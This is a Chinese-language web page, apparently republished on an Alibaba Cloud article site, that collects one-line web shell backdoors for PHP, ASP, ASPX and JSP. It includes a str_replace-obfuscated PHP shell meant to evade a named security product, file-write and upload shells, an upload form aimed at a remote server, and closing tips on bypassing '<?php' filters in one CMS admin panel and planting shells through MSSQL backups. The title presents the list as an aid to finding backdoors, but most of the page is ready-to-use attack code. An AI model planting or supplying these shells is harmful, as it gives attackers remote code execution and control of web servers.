整理的比較全的一句話後門代碼(方面大家尋找後門)

最後更新：2018-12-08 來源：互聯網

上載者：User

創建阿里雲帳戶，並獲得超過 40 款產品的免費試用版；而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊！

最近一句話後門不斷升級大家注意防範，基本上多事字元替換

過護衛神PHP一句話作者：小東

複製代碼代碼如下:<?php $a = str_replace(x,”",”axsxxsxexrxxt”);
$a($_POST["c"]); ?>

測試成功，主要對付護衛神，其他的也可以試試

dedecms5.7一句話後門
@eval(file_get_contents('php://input'));

asp一句話木馬

程式碼
<%eval request("sb")%>

程式碼
<%execute request("sb")%>

程式碼
<%execute(request("sb"))%>

程式碼
<%execute request("sb")%><%'<% loop <%:%>

程式碼
<%'<% loop <%:%><%execute request("sb")%>

程式碼
<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

程式碼
%><%Eval(Request(chr(35)))%><%

程式碼
<%eval request("sb")%>

程式碼
<%ExecuteGlobal request("sb")%>

程式碼
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
//容錯代碼
程式碼
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性別' : eval, '年齡' : '18', '暱稱' : '請叫我一聲老大'};
lcx.性別((lcx.名字)+'');
%>

//使用冰狐一句話用戶端連結

程式碼
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '參數SubCode作為過程代碼
o.run "e",Server,Response,Request,Application,Session,Error '參數名e 調用之，同時壓入6個基底物件作為參數
%>

調用樣本：
程式碼
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29

php一句話

程式碼
<?php eval($_POST[sb])?>

程式碼
<?php @eval($_POST[sb])?>
//容錯代碼
程式碼
<?php assert($_POST[sb]);?>
//使用lanker一句話用戶端的專家模式執行相關的php語句
程式碼
<?$_POST['sa']($_POST['sb']);?>

程式碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>

程式碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用這個後,使用菜刀一句話用戶端在配置串連的時候在"配置"一欄輸入
程式碼
<O>h=@eval($_POST[c]);</O>

程式碼
<script language="php">@eval($_POST[sb])</script>
//繞過<?限制的一句話

JSP一句話

程式碼
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

提交用戶端

程式碼
<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value="提交">
</form>

ASPX一句話
程式碼
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

程式碼
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句話

程式碼
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
//C#的asp.net一句話

程式碼
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
VB的asp.net一句話
第一:114la網址導航系統後台getwebshell,最新版本,已經禁止了直接輸入<?php這樣的代碼
所以可以試用<script language="php">...<script>來繞過
第二,使用菜刀的附加資料功能可以出現很多轉換.所以還是仔細閱讀下菜刀的readme.txt,上面的代碼來自LCX的部落格
第三,使用mssql備份一句話的時候,特別是asp.net和jsp,因為代碼過長,所以,需要再代碼前面和後面多加空格等垃圾字元保證代碼完整性,這個跟備份bat到啟動項一個原理.

本文章原先以中文撰寫並發佈於 aliyun.com，亦設英文版本，僅作資訊用途。本網站不對文章的準確性，完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴，請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡，一經驗證之後，即會刪除該侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

整理的比較全的一句話後門代碼(方面大家尋找後門)

聯繫我們

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support